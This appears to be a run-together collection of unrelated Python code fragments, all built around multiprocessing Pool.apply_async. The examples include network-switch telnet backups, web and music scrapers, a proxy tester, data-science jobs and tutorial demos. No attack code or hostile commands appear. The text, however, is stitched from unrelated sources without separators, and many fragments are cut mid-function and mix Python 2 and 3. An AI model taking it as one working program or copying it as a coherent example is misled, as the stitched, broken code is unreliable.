# 退出telnet def logout_host(self): self.tn.write(b"quit\n") #执行交换机备份 def switchbak(i,u,p,c): telnet_client = TelnetClient() if telnet_client.login_host(i,u,p) : telnet_client.execute_some_command(c) telnet_client.logout_host() if __name__ == '__main__': print('开始多进程并发备份') start=time.time() #50为进程数,用户可根据客户端及服务器配置自行调整,注意:过大进程易被安全软件识别为恶意攻击 p=Pool(50) for ip in open('switchs.txt').readlines(): ip=ip.strip() #交换机具备backup命令的telnet用户 username = '******' #该用户密码 password = '******' #tftp服务器地址 ftphost ='TFTP IP' filename = ip.replace('.','.')+ '-'+datetime.date.today().strftime('%Y%m%d')+'.cfg' command1 = 'backup startup-configuration to ' +(ftphost)+' '+ filename p.apply_async(switchbak,args=(ip,username,password,command1)) p.close() p.join() end=time.time() print('备份完成,耗时:%0.2f 秒' %(end-start) )
def write_to_database(name, content): ''' 创建数据库,并初始化表''' conn = sqlite3.connect(name) cursor = conn.cursor() cursor.execute('INSERT INTO job (company,salary,require,company_benefits,feature,industry) \ VALUES (?,?,?,?,?,?)' ,\ (content['company'],content['salary'],content['require'],content['Company benefits'],content['feature'],content['industry'])) cursor.close() conn.commit() conn.close() def main(i): url = "https://www.lagou.com/zhaopin/Python/" + str(i) + "/" html = get_html(url) for item in parse(html): write_to_database('job.db', item) time.sleep(60) print('page %s done.' % url) if __name__ == "__main__": init_database('job.db') p = Pool() for i in range(1, 31): p.apply_async(main, args=(i, )) p.close() p.join() print('Done')
def run(self, cut_date, percent, run_num=100): pool = Pool(28) for i in range(run_num): pool.apply_async(self.train_fun, args=(cut_date, percent)) pool.close() pool.join()
def main(): os.chdir("../data/structure_11660/") files = glob.glob("*.cif") print(len(files)) print(type(files)) # structure = cif_structure(files[0]) # gen_3d_Plot(structure) # x_min= x_max=y_min=y_max=z_min= z_max = 0 # x_min,x_max,y_min,y_max,z_min, z_max = min_max_dataset(files) # print(x_min,x_max,y_min,y_max,z_min, z_max) # structure = cif_structure(files[10]) # distance_matrix = structure.distance_matrix # print(files[0]) # print(distance_matrix.shape) # graph = nx.from_numpy_matrix(distance_matrix) # nx.draw(graph) # plt.show() # total_unique_species = set() # file_write = open("sizes.dat","w") elements = {} reference_set = set() reference_set.add("H") reference_set.add("N") reference_set.add("C") reference_set.add("O") reference_set.add("Co") reference_set.add("P") reference_set.add("Zn") reference_set.add("Ag") reference_set.add("Cd") reference_set.add("Cu") reference_set.add("Fe") Num_Processes = 20 num_files = len(files) file_chunks = [ files[int((num_files / Num_Processes) * i):int((num_files / Num_Processes * (i + 1)))] for i in range(Num_Processes) ] for each in file_chunks: print(each) pool = Pool(processes=Num_Processes) results = [ pool.apply_async(func, args=(file_chunks[i], )) for i in range(Num_Processes) ] output = [p.get() for p in results] log = open("files.log", "w") for returned_list in output: for each in returned_list: log.write(each) log.write("\n") log.close()
DPC(path + 'R15.dat', 'R15', 15, plot=axes[2][1]) DPC(path + 'D31.dat', 'D31', 31, plot=axes[3][0]) DPC(path + 'jain.dat', 'jain', 2, plot=axes[3][1]) DPC(path + 'pathbased.dat', 'pathbased', 3, dc_percent=4, plot=axes[4][0]) DPC(path + 'compound.dat', 'compound', 5, dc_percent=4, plot=axes[4][1]) plt.show() if __name__ == '__main__': # 绘制全部数据集结果 # draw_all_cluster() # 绘制指定数据集详情 p = Pool(4) path = sys.path[0] + '/dataset/' # path | title | N: 聚类数 | dc method | dc per | rho method | delta method | use_halo | plot p.apply_async(cluster, args=(path + 'origin_1000.dat', 'origin-1000', 5, 0, 2, 1, 1, True)) # p.apply_async(cluster, args=(path + 'origin_4000.dat', 'origin-4000', 5, 0, 2, 1, 1, True)) # p.apply_async(cluster, args=(path + 'flame.dat', 'flame', 2, 0, 3, 1, 1, True)) # p.apply_async(cluster, args=(path + 'spiral.dat', 'spiral', 3, 0, 2)) # p.apply_async(cluster, args=(path + 'aggregation.dat', 'aggregation', 7, 0, 3)) # p.apply_async(cluster, args=(path + 'R15.dat', 'R15', 15)) # p.apply_async(cluster, args=(path + 'D31.dat', 'D31', 31)) # p.apply_async(cluster, args=(path + 'jain.dat', 'jain', 2)) # p.apply_async(cluster, args=(path + 'pathbased.dat', 'pathbased', 3, 0, 4)) # p.apply_async(cluster, args=(path + 'compound.dat', 'compound', 5, 0, 4)) p.close() p.join()
# if __name__ =='__main__': # print('Parent process %s.' % os.getpid()) # p = Process(target=run_proc,args=('test',)) # print('Child process will start.') # p.start() # p.join() # print('Child process end') from multiprocessing import Pool import os, time, random def long_time_task(name): print('Run task %s(%s)...' % (name, os.getppid())) start = time.time() time.sleep(random.random() * 3) end = time.time() print('Task %s runs %0.2f seconds.' % (name, (end - start))) if __name__ == '__main__': print('Parent process %s' % os.getppid()) p = Pool(4) for i in range(5): p.apply_async(long_time_task, args=(i, )) print('Waiting for all subprocesses done...') p.close() p.join() print('All sunprocesses done.') #该看子进程
import requests import urllib.request def start_pool(filename, download_url): urllib.request.urlretrieve(download_url, 'F:\\music\\' + filename + '.mp3') if __name__ == '__main__': name = input('欢迎来到音乐下载系统, 请输入想要下载的音乐:') # 搜索歌曲地址 filePath = 'http://songsearch.kugou.com/song_search_v2?keyword=%s&page=1&pagesize=30' text = requests.get(filePath % name).text jsobj = json.loads(text) list = jsobj['data']['lists'] for i in list: filename = i['FileName'] # 歌曲名 filehash = i['FileHash'] # 歌曲hash print(u'已搜索到音乐 %s' % filename) url = 'http://www.kugou.com/yy/index.php?r=play/getdata&hash=2688ADB1CA449448388270987BDCE6E8&album_id=960327' page = requests.get(url).text page_json = json.loads(page) down_url = page_json['data']['play_url'] pool = Pool(processes=4) print(u'正在为你下载音乐: [%s] ' % filename) print(u'音乐下载地址为 ', down_url) pool.apply_async(start_pool, (filename, down_url)) pool.close() pool.join()
def pos_sum_c(main_model, data, time_para, result_file_name, pot_in_num, leve_ratio_num, sp_in, ic_num, fit_ratio): time_para_dict = dict() time_para_dict['time_para_1'] = [ pd.to_datetime('20110101'), pd.to_datetime('20150101'), pd.to_datetime('20150701') ] time_para_dict['time_para_2'] = [ pd.to_datetime('20120101'), pd.to_datetime('20160101'), pd.to_datetime('20160701') ] time_para_dict['time_para_3'] = [ pd.to_datetime('20130601'), pd.to_datetime('20170601'), pd.to_datetime('20171201') ] time_para_dict['time_para_4'] = [ pd.to_datetime('20140601'), pd.to_datetime('20180601'), pd.to_datetime('20181001') ] time_para_dict['time_para_5'] = [ pd.to_datetime('20140701'), pd.to_datetime('20180701'), pd.to_datetime('20181001') ] time_para_dict['time_para_6'] = [ pd.to_datetime('20140801'), pd.to_datetime('20180801'), pd.to_datetime('20181001') ] data_n = data[data['time_para'] == time_para] begin_date, cut_date, end_date = time_para_dict[time_para] a_n = data_n[(data_n['ic'].abs() > ic_num) & (data_n['pot_in'].abs() > pot_in_num) & (data_n['leve_ratio'].abs() > leve_ratio_num) & (data_n['sp_in'].abs() > sp_in) & (data_n['fit_ratio'].abs() > fit_ratio) & (data_n['sp_in'] * data_n['sp_out_4'] > 0)] sum_factor_df = pd.DataFrame() pnl_save_path = '/mnt/mfs/dat_whs/data/mix_factor_pnl/' + result_file_name bt.AZ_Path_create(pnl_save_path) result_list = [] pool = Pool(20) for i in a_n.index: # bkt_fun(main_model, pnl_save_path, a_n, i,) result_list.append( pool.apply_async(bkt_fun, args=( main_model, pnl_save_path, a_n, i, ))) pool.close() pool.join() for res in result_list: sum_factor_df = sum_factor_df.add(res.get(), fill_value=0) sum_pos_df = main_model.deal_mix_factor(sum_factor_df).shift(2) in_condition, out_condition, ic, sharpe_q_in_df_u, sharpe_q_in_df_m, sharpe_q_in_df_d, pot_in, \ fit_ratio, leve_ratio, sp_in, sharpe_q_out, pnl_df = filter_all(cut_date, sum_pos_df, main_model.return_choose, if_return_pnl=True, if_only_long=False) print(in_condition, out_condition, ic, sharpe_q_in_df_u, sharpe_q_in_df_m, sharpe_q_in_df_d, pot_in, fit_ratio, leve_ratio, sp_in, sharpe_q_out) # plot_send_result(pnl_df, bt.AZ_Sharpe_y(pnl_df), 'mix_factor') return sum_pos_df, pnl_df
else: annotated_left = max(annotated_left, \ min(np.inf, np.inf, *timestamps[word][csvbase][annotator_key][1])) annotated_right = min(annotated_right, \ max(0, 0, *timestamps[word][csvbase][annotator_key][2])) intervals[human] = interval(*[[x[1],x[2]] for _,x in \ timestamps[word][csvbase][annotator_key].iterrows()]) print('left = ' + str(annotated_left)) print('right = ' + str(annotated_right)) if not use_longest_human_interval: for human in humans: intervals[human] &= interval( [annotated_left, annotated_right]) intervals[pr] &= interval([annotated_left, annotated_right]) if congruence_parallelize != 0: everyone[pr][word][csvbase] = pool.apply_async( doit, (intervals, )) else: everyone[pr][word][csvbase], \ onlyone_tic[pr][word][csvbase], notone_tic[pr][word][csvbase], \ onlyone_word[pr][word][csvbase], notone_word[pr][word][csvbase] = \ doit(intervals) def plot_file(fig, fig_venn, only_data, not_data): ax = fig.add_subplot(nrows, ncols, iplot) if len(sorted_hm) < 4: ax_venn = fig_venn.add_subplot(nrows, ncols, iplot) ax_venn.set_title(os.path.basename(csvbase), fontsize=8) xdata = [ 'Everyone', *['only ' + (x if x != pr else 'SongExplorer') for x in sorted_hm]
# 子进程1 负责放 def write(): for s in ["A", "B", "C"]: q.put(s) # 子进程2 负责取 def read(): while True: try: print(q.get(block=False)) # 因为用了apply 等着放完 不会报错 # print(q.get(block=True,timeout=1)) except: break if __name__ == "__main__": # 创建管道 进程池中创建管道必须用这个 不能直接queue q = Manager().Queue() pool = Pool() # 添加任务,用apply阻塞 先放再取 #pool.apply(func=write) pool.apply_async(func=write)# 如果非要async name 配合timeout #pool.apply(func=read) pool.apply_async(func=read) # 关闭进程池 pool.close() pool.join()
def start(name, dir): word = name dirpath = mkDir(dir) urls = buildUrls(word) index = 0 for url in urls: print("正在请求:", url) html = requests.get(url, timeout=10).content.decode('utf-8') imgUrls = resolveImgUrl(html) if len(imgUrls) == 0: # 没有图片则结束 break for url in imgUrls: if downImg(url, dirpath, str(index) + ".jpg"): index += 1 print(name, ": 已下载 %s 张" % index) if index == MAX: return if __name__ == '__main__': p = Pool(processes=POOLNUM) for name, dir in PIC_TYPES.items(): print(name, dir) p.apply_async(start, (name, dir)) print('Waiting for all subprocesses done...') p.close() p.join() print('All subprocesses done.')
# pool.apply_async(func=funds.get_fund_data, args=(data['code'].values[num], # sdate.strftime('%Y-%m-%d'), # edate.strftime('%Y-%m-%d'),)) # global toAnalysis toAnalysis = pd.DataFrame(columns=funds.colName) #txt = Count = int(args.amount) if args.amount is not None else None for ids, item in enumerate(data['Name'].tolist()[:Count]): print('Processing {:s} '.format(item)) toAnalysis_add = pool.apply_async(func=analysis, args=(data, item, toAnalysis, )).get() toAnalysis = toAnalysis.append(toAnalysis_add, ignore_index=True) # analysis(data, item, toAnalysis) # pool.apply_async(func=analysis, args=(data, item, toAnalysis, )) #os.chdir('./Analysis') #for analysis_result in sorted(glob.glob('*.csv')): # analysis_db = pd.read_csv(analysis_result, sep='\t') # try: # analysis_db.drop(columns=['Unnnamed: 0'], inplace=True) # finally: # toAnalysis = toAnalysis.append(analysis_db, ignore_index=True) # print(analysis_result.split('.')[0]) # os.remove(analysis_result)
def main(args): ''' entry point ''' if len(args) < 1: usage() selected = None if len(args) > 2: selected = args[2] if not os.path.exists(selected): usage() config_uri = args[1] options = parse_vars(args[3:]) settings = get_appsettings(config_uri, options=options) engine = engine_from_config(settings, 'sqlalchemy.') DBSession.configure(bind=engine) setup_logging(config_uri) global log log = logging.getLogger(__name__) global cache_dir cache_dir = settings['cache.dir'] + "/v3stats" # global to enable us to handle KeyboardInterrupts without leaving zombies around. global pool pool = Pool(processes=cpu_count() * 2) if not selected: selected = select_latest() objects = [] pids = [] stats_path = extract_tarbz2(selected) for filename in os.listdir(stats_path + '/stats'): try: run = pool.apply_async(read_stats, (stats_path + '/stats', filename), callback=objects.append) pids.append(run) except Exception as exc: print exc log.debug(exc) raise # get the output of all our processes for pid in pids: pid.get() # ensure the sqlalchemy objects aren't garbage-collected before we commit them. # see: http://docs.sqlalchemy.org/en/latest/orm/session_state_management.html#session-referencing-behavior merged = [] uidlist = {} for uids, arglist in objects: for table, defaults, kwargs in arglist: if table in uidlist.keys(): uidlist[table].update(uids) else: uidlist[table] = uids obj = insert_or_update(DBSession, table, defaults=defaults, **kwargs) merged.append(DBSession.merge(obj)) try: transaction.commit() except IntegrityError as exc: DBSession.rollback() log.error(exc) pool.close() pool.join() for table in uidlist: rgx = re.compile(r'v3stats-(\d{4}-\d{2}-\d{2}).tar.bz2') scandate, = rgx.search(selected).groups() expire(DBSession, table, uidlist[table], scandate) shutil.rmtree(stats_path)
def simulate_observations(event_class, processes=1): """ Simulate observations for event class Parameters ---------- event_class : dict Event class processes : int, optional Number of parallel processes """ # Dump header print('Simulate observations for "%s" event class' % (event_class['name'])) # Get current working directory cwd = os.getcwd() # Set filenames dirname = 'gps/data/%s' % (event_class['name']) obsname = '../../obs/gps_obs_%s_obsdef.xml' % (event_class['name']) modname = '../../models/models_gps.xml' iemname = '../../models/model_iem.xml' # Create directory for data makedirs(dirname) # Step into data directory os.chdir(dirname) # Load observations observations = gammalib.GObservations(obsname) # Load models models = gammalib.GModels(modname) models_iem = gammalib.GModels(iemname) models.extend(models_iem) # Create a pool of processes (need to do this after loading the observations) if processes > 1: pool = Pool(processes=processes) # Loop over all observations for obs in observations: # Define process arguments args = (obs, event_class['name'], models) # Start processes if processes > 1: pool.apply_async(simulate_observation, args) print('Schedule observation "%s" for "%s" event class' % (obs.id(), event_class['name'])) else: simulate_observation(*args) # For testing #if obs.id() == '000002': # break # Wait for all processes to finish if processes > 1: pool.close() pool.join() # Step out of working directory os.chdir(cwd) # Return return
def main(duration, directory, delay, stage=None, bCheckAlignment=False, n_tubes=1): # Initialize stage if not stage: stage = initialize_stage(x_only=(n_tubes == 1)) # Check alignment if requested if bCheckAlignment: click.pause(info='ALIGNMENT - Align stage to the back left corner and press any key to continue...') check_alignment(stage, x_only=(n_tubes == 1)) # Start imaging loop x0 = stage.posX y0 = stage.posY n_img_per_tube = CAPILLARY_LENGTH // CAPILLARY_X_INTERVAL click.pause("READY - Press any key to start...") t_end = int(time() + duration * 3600) # t_end in unix seconds t_int = int(time()) seq_nb = 0 # Sequence number # Create a pool of 1 worker pool = Pool(processes=1) async_work = None with tqdm(desc='Time', position=0, leave=True, total=int(t_end-t_int), disable=(duration == -1 or logging.getLogger().getEffectiveLevel() == logging.DEBUG)) as bar_time: while (time() < t_end) or (duration == -1): with tqdm(total=n_tubes*n_img_per_tube, desc="Run #{}".format(seq_nb), position=1, leave=False, disable=logging.getLogger().getEffectiveLevel() == logging.DEBUG) as bar_run: for i in range(n_tubes): for j in range(n_img_per_tube): sleep(delay) # Wait for previous camera download to finish, if any if async_work: logging.debug('main - Waiting for camera transfer to finish...') async_work.get(timeout=10) # Capture and save a new image filename = os.path.join(directory, datetime.datetime.now().strftime("%y%m%d_%H%M%S") + '_x{}_y{}_seq{}_CrystKinetics.jpg'.format(j, i, seq_nb)) logging.debug('main - Starting camera worker') async_work = pool.apply_async(camera_full, (filename,)) # Wait until capture is done sleep(delay) # Goto next imaging position direction = -1 if i % 2 == 0 else 1 stage.moveX(direction * CAPILLARY_X_INTERVAL) sleep(1) # Update progress bars bar_run.update(1) t_now = int(time()) bar_time.update(t_now-t_int) t_int = t_now if i < n_tubes-1: stage.moveY(CAPILLARY_Y_INTERVAL) stage.goto(x0, y0) seq_nb += 1 logging.info("Capture done.")
from multiprocessing import Pool from time import sleep, ctime #事件函数 def worker(msg): sleep(2) print(msg) return msg + 'over' #创建进程池,放4个进程 pool = Pool(processes=4) #可以直接写4 result = [] for i in range(10): msg = 'hello %d' % i #将事件放入进程池 r = pool.apply_async(func=worker, args=(msg, )) # pool.apply(func = worker,args = (msg,)) #保存返回值对象 result.append(r) #关闭进程池 pool.close() #回收进程池 pool.join() # for i in result: print(i.get())
if response: print(proxy['http']) except: pass if __name__ == '__main__': # test_ip() proxy = getProxy() # IPPool1 = [] # time1 = time.time() # for item in proxy: # IPPool1.append(test(item)) # time2 = time.time() # print('singleprocess needs ' + str(time2 - time1) + ' s') pool = Pool() IPPool2 = [] temp = [] time3 = time.time() for item in proxy: temp.append(pool.apply_async(test, args=(item, ))) pool.close() pool.join() for item in temp: IPPool2.append(item.get()) time4 = time.time() print('multiprocess needs ' + str(time4 - time3) + ' s') get_real_ip_pool() # '176.235.11.6:8080','176.9.28.86:1080','5.189.135.164:3128','64.33.171.19:8080','166.111.131.52:3128','51.15.196.77:8888','93.94.223.18:8080','123.125.159.122:80','50.205.154.101:3128','118.114.77.47:8080'
# -*-coding:utf8-*- from multiprocessing import Pool import os, time, random def long_time_task(name): print('Run task %s (%s)...' % (name, os.getpid())) start = time.time() time.sleep(random.random() * 3) end = time.time() print('Task %s runs %0.2f seconds.' % (name, (end - start))) if __name__ == '__main__': print('Parent process %s.' % os.getpid()) # 启动大量的子进程,可以用进程池的方式批量创建子进程 # 这里设置pool最多同时执行4个进程 # 由于Pool的默认大小是CPU的核数,如果你不幸拥有8核CPU,你要提交至少9个子进程才能看到等待效果 p = Pool(4) for i in range(5): p.apply_async(long_time_task, args=(i, )) # 函数的参数以元组的方式传入 print('Waiting for all subprocesses done...') p.close() # close()之后不能添加新的process了 p.join() # 等待所有子进程执行完毕;必须先调用close() print('All subprocesses done.')
if not os.path.exists('addsv_logs_' + os.path.basename(args.outBamFile)): os.mkdir('addsv_logs_' + os.path.basename(args.outBamFile)) print "INFO\t" + now( ) + "\tcreated log directory: addsv_logs_" + os.path.basename( args.outBamFile) with open(args.varFileName, 'r') as varfile: for bedline in varfile: if re.search('^#', bedline): continue if args.maxmuts and nmuts >= int(args.maxmuts): break # submit each mutation as its own thread result = pool.apply_async(makemut, [args, bedline]) results.append(result) nmuts += 1 if args.delay is not None: sleep(int(args.delay)) ## process the results of multithreaded mutation jobs for result in results: tmpbam = None exclfn = None tmpbam, exclfn = result.get() if tmpbam is not None and exclfn is not None: tmpbams.append(tmpbam)
import time from multiprocessing import Pool """ apply : 调用函数,传递任意参数 map: 把一个可迭代对象 映射 到 函数 """ def test(x, y, z=0): # z=0 """执行脚本,执行过程需要30分钟""" print('~~~~') time.sleep(2) return x + y if __name__ == '__main__': pool = Pool(2) # apply(self, func, args=(), kwds={}) # apply(self,func,*args,**kwds) result = pool.apply(test, (2, 3), {'z': 1}) # 阻塞 主程序(主进程) 同步 pool.apply_async(test, (2, 3)) # 不阻塞 主程 异步 print("finished!")
if __name__ == "__main__": # Format: ['month','day'] dates_to_add = [ ["10", "23"], ["10", "25"], ["10", "27"], ] for month in xrange(3, 12 + 1): for day in xrange(1, 31 + 1): a = str(day).zfill(2) m = str(month).zfill(2) dates_to_add.append([m, a]) print dates_to_add from multiprocessing import Pool, TimeoutError pool = Pool(processes=8) for d in dates_to_add: fileName = "bptx_mon_timing_2016_" + d[0] + "_" + d[1] + "_UTC" pool.apply_async(convertToROOT, args=( DATAPATH, fileName, )) # convertToROOT(DATAPATH, fileName) pool.close() pool.join()
default=1) parser.add_argument('--stepsize', dest='step_size', type=float, default=0.01) parser.add_argument('--visualize', action="store_true", default=False) # parser.add_argument('--timeout', type=int, help="Number of seconds before individual test run is killed.") args = parser.parse_args() pool = Pool(processes=args.pool_size) # Arguments for the agent and environment agent_env_args = dict( step_size=args.step_size, visualize=args.visualize, # OsimEnv print_summary=False, test_mode=True) # launching multiple evaluations asynchronously *may* use more processes start_time = dt.datetime.now() test_results = [ pool.apply_async(run_test, (args.model, agent_env_args, args.action_repeat)) for i in range(args.run_count) ] rewards = [res.get() for res in test_results] mean, min_reward, max_reward = np.mean(rewards), min(rewards), max(rewards) print("Mean test reward over %d runs in %.1f seconds: %.3f [%.3f, %.3f]" % (args.run_count, (dt.datetime.now() - start_time).total_seconds(), mean, min_reward, max_reward))
import sys # unique_id = sys.argv[1] unique_id = 'test' s_time = time.time() funcUtil.killRunningProcess(unique_id) funcUtil.recordPid(unique_id) funcUtil.recordStatus(unique_id, 'Start ...') p = Pool() result_list = [] for i in range(process_num): result_list.append(p.apply_async(run, args=(i, process_num, unique_id))) print 'Waiting for all subprocesses done...' p.close() p.join() print 'All subprocesses done.' result_list = map(lambda x: x.get(), result_list) def compare_accuracy(a, b): record_a = a[1]['test_record'] record_b = b[1]['test_record'] mean_accuracy_a = (record_a['Test']['accuracy'] + record_a['Validation']['accuracy']) / 2.0 mean_accuracy_b = (record_b['Test']['accuracy'] + record_b['Validation']['accuracy']) / 2.0
def main(): pool = Pool() pool.apply_async(notificate) pool.apply_async(answer)
if path not in existingTree: total += 1 total += countMissing(existingTree[path], wantedTree[path]) return total def solve(existingTree, wantedTree): return countMissing(existingTree, wantedTree) if __name__ == '__main__': inp = open(FILE_NAME_BASE + '.in', 'r') numCases = int(inp.readline()) if NUM_PROCESSES == 0: results = [ solve(*parse(inp)) for _ in range(numCases) ] else: from multiprocessing import Pool pool = Pool(NUM_PROCESSES) results = [ pool.apply_async(solve, parse(inp)) for _ in range(numCases) ] inp.close() out = open(FILE_NAME_BASE + '.out', 'w') for case, result in enumerate(results): value = result if NUM_PROCESSES == 0 else result.get() out.write('Case #%d: %s\n' % (case + 1, value)) out.flush() out.close()